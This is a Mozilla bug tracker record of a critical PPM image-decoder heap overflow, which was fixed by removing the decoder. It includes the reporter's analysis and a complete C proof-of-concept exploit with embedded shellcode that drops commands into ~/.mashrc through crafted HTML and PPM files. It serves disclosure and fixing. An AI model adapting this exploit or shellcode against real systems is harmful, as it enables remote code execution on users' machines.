Closed Bug 220721 Opened 21 years ago Closed 21 years ago

exploitable heap corruption via PPM module

Categories

(Core :: Graphics: ImageLib, defect)

Product:
Core
Component:
Graphics: ImageLib
Version:
1.4 Branch
Platform:
x86
Linux
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: dveditz, Assigned: jdunn)

Details

(Keywords: fixed1.4.2, Whiteboard: [sg:fix])

From our pal zen-parse: Issue details: Example file that crashes Netscape. ===BEGIN=== P1 0 100 111111111111111111111111111 ====END==== (This is an 'image/x-portable-bitmap' type file). modules/libpr0n/decoders/ppm/nsPPMDecoder.cpp: mImage->Init(mWidth, mHeight, mObserver); if (mObserver) mObserver->OnStartContainer(nsnull, mImage); mFrame->Init(0, 0, mWidth, mHeight, GfxIFormats::RGB, 24); No check is made that the Init()s succeeded. Adding a NS_ENSURE_SUCCESS(rv, rv); after each would help. NS_METHOD nsPPMDecoder::checkSendRow() This function checks mRowDataFill == mBytesPerRow as the condition for end of row AFTER incrementing mRowDataFill. In this case, mBytesPerRow is 0 while mRowDataFill is 1. The condition isn't met, so there is an overflow. Using this it is possible to manipulate the malloc structure for mRowData, and other data on the heap. A carefully contructed website or email could potentially exploit this problem to execute commands with the local user's permissions. I have successfully inserted controlled values into registers used in heap manipulation functions.
Follow-up from zen-parse with exploit details on Linux, he thinks windows is vulnerable as well. Can someone test this on Linux? Issue details: Code creates ~/.mashrc make peppermint; ./peppermint return_address [GOT of PR_Free] eg: ./peppermint 0x44524f42 ./peppermint 0xdeadbeef 0xc0cac01a generates multiple files: cute.html - Shellcode loader which refreshes to cuter.html cuter.html - HTML document holding cute.ppm cute.ppm - the malformed image ugly.ppm - the shellcode. These files can be zipped down to about 100k, and then referenced by a jar: url to exploit. ====BEGIN==== /* * Proof of concept exploit code for PPM handler vuln. * zen-parse Mon 29 September 2003 10.23am NZST * peppermint.c */ #include <stdio.h> /* address of free in libnspr4.so on RH8.0 */ /* 1st == ./netscape -g -d ldd |grep nspr4 */ /* 2nd == objdump -R libnspr4.so |grep PR_Free */ /* 3rd == -12 which is a fixed offset */ #define GOT 0x40096000 + 0x00031e04 - 12 char sc[]= "\xeb\x02\xeb\x0d\xe8\xf9\xff\xff\xff\x90\x90\x90\x90\x90\x90\x90" "\x90\x58\x8b\x18\x85\xdb\x75\x02\xeb\xfe\x31\xdb\x89\x18\xbc\xe0" "\xff\xff\xbf\x89\xe6\xbb\x01\x48\x4f\x4d\x4b\x4e\x8b\x0e\x39\xcb" "\x75\xf9\xbb\x4f\x4d\x45\x3d\x46\x46\x8b\x0e\x39\xcb\x74\x04\x4e" "\x4e\xeb\xe2\xc7\x06\xef\xbe\xad\xde\x81\x2e\xef\xbe\xad\xde\x46" "\x46\x46\x46\x89\xf7\x46\x8b\x0e\x84\xc9\x75\xf9\xc7\x06\x2f\x2e" "\x6d\x61\x46\x46\x46\x46\xc7\x06\x73\x68\x72\x63\x46\x46\x46\x46" "\xc7\x06\xef\xbe\xad\xde\x81\x2e\xef\xbe\xad\xde\x31\xc0\x31\xc9" "\x31\xd2\x89\xfb\x04\x0a\xcd\x80\x31\xc0\x04\x05\x80\xc1\x41\x66" "\x81\xc2\xb0\x01\xcd\x80\x89\xc6\x40\x85\xc0\x74\x17\xeb\x1a\x59" "\x89\xf3\x31\xd2\xb2\x50\x31\xc0\x04\x04\xcd\x80\x89\xf3\x31\xc0" "\x04\x06\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe1\xff\xff\xff\x23\x73" "\x6f\x6d\x65\x20\x72\x61\x6e\x64\x6f\x6d\x20\x63\x6f\x6d\x6d\x61" "\x6e\x64\x73\x0a\x74\x6f\x75\x63\x68\x20\x2f\x76\x61\x72\x2f\x74" "\x6d\x70\x2f\x6f\x77\x6e\x65\x64\x2e\x60\x77\x68\x6f\x61\x6d\x69" "\x60\x0a\x65\x78\x69\x74\x0a\x7a\x65\x6e\x2d\x70\x61\x72\x73\x65" "\x20\x6f\x77\x6e\x65\x64\x20\x79\x6f\x75\x2e\x2e\x2e\x0a"; char buf[40960]; char ubuf[40960]; main(int argc, char *argv[]) { FILE *p; union { int i; char c[4]; } r,g; int c,d; if(argc<2)exit(1); r.i=strtoul(argv[1],0,0); g.i=(argc!=3)?GOT: strtoul(argv[2],0,0)-12; unlink("cute.ppm"); p=fopen("cute.ppm","w"); if(!p)exit(1); fprintf(p,"P3 0 100 255\n"); fprintf(p,"0 0 0 0\n0 0 0 0\n0 0 0 0\n0 0 0 0\n"); fprintf(p,"%hhu %hhu %hhu %hhu\n",g.c[0],g.c[1],g.c[2],g.c[3]); fprintf(p,"%hhu %hhu %hhu %hhu\n",r.c[0],r.c[1],r.c[2],r.c[3]); fclose(p); unlink("cute.html"); p=fopen("cute.html","w"); if(!p)exit(1); fprintf(p,"<html>\n"); fprintf(p,"<head>\n"); fprintf(p,"<meta HTTP-EQUIV=\"Refresh\" content=\"4; URL=cuter.html\">\n"); fprintf(p,"<title>Proof of concept for PPM bug</title>\n"); for(c=0;c<3000-strlen(sc) - 0x40;c+=2) { buf[c+0]=0xeb; buf[c+1]=0x40; } fprintf(p,"</head>\n"); fprintf(p,"<body>"); fprintf(p,"<img src=ugly.ppm>"); fprintf(p,"</body></html>"); fclose(p); for(;c<3000-strlen(sc);c++) buf[c]=0x40; strcat(buf,sc); unlink("ugly.ppm"); p=fopen("ugly.ppm","w"); if(!p)exit(1); fprintf(p,"P6 2000 8192 255\n"); for(c=0;c<8192*2;c++) { fprintf(p,"%s",buf); } fclose(p); unlink("cuter.html"); p=fopen("cuter.html","w"); if(!p)exit(1); fprintf(p,"<html>\n"); fprintf(p,"<head>\n"); fprintf(p,"<title>Proof of concept for PPM bug : boom</title>\n"); fprintf(p,"</head>\n"); fprintf(p,"<body>"); for(c=0;c<100;c++) { fprintf(p,"<img src=cute.ppm>"); } fprintf(p,"</body></html>"); } =====END=====
Flags: blocking1.5+
Flags: blocking1.4.2+
Updating version to 1.4 branch -- PPM was removed from the trunk early in 1.5
Flags: blocking1.5+
Version: Trunk → 1.4 Branch
personally, I'd fix this by removing the PPM decoder from the 1.4 branch as well. it's not exactly used much.
OK, I'm going to remove ppm from the 1.4.2 branch. Any objections?
PPM removed from the branch.
Status: NEW → RESOLVED
Closed: 21 years ago
Resolution: --- → FIXED
Keywords: fixed1.4.2
verified... PPM module no longer available to be corrupted
Status: RESOLVED → VERIFIED
Whiteboard: [sg:fix]
Removing security-sensitive flag for bugs on the known-vulnerabilities list
Group: security
You need to log in before you can comment on or make changes to this bug.